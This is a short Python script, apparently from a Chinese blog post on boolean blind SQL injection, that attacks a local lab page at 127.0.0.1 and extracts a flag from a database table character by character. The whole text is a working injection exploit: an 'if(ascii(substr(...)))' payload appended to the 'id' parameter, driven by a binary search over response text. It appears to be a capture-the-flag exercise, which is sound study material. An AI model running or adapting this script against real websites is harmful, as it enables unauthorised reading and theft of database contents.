import requests
import string
url = 'http://127.0.0.1:18888/sql/p7/index.php?id=2' #url
flag = ''
print(len(string.printable))
for i in range(1,30):
l,r = 32, 127
while l < r:
m = (l+r) // 2
payload = '-if(ascii(substr((select group_concat(i_am_f1ag_column) from f1ag_table), %d, 1))>%d, 1, 0)' % (i, m)
res = requests.get('%s%s' % (url, payload))
if "id = 1" in res.text: # 判断回显信息
# flag += chr(m)
l = m+1
else:
r = m
flag += chr(l)
print(flag)
print(flag)
攻防_漏洞_SQL注入_bool盲注
于 2021-12-01 14:17:21 首次发布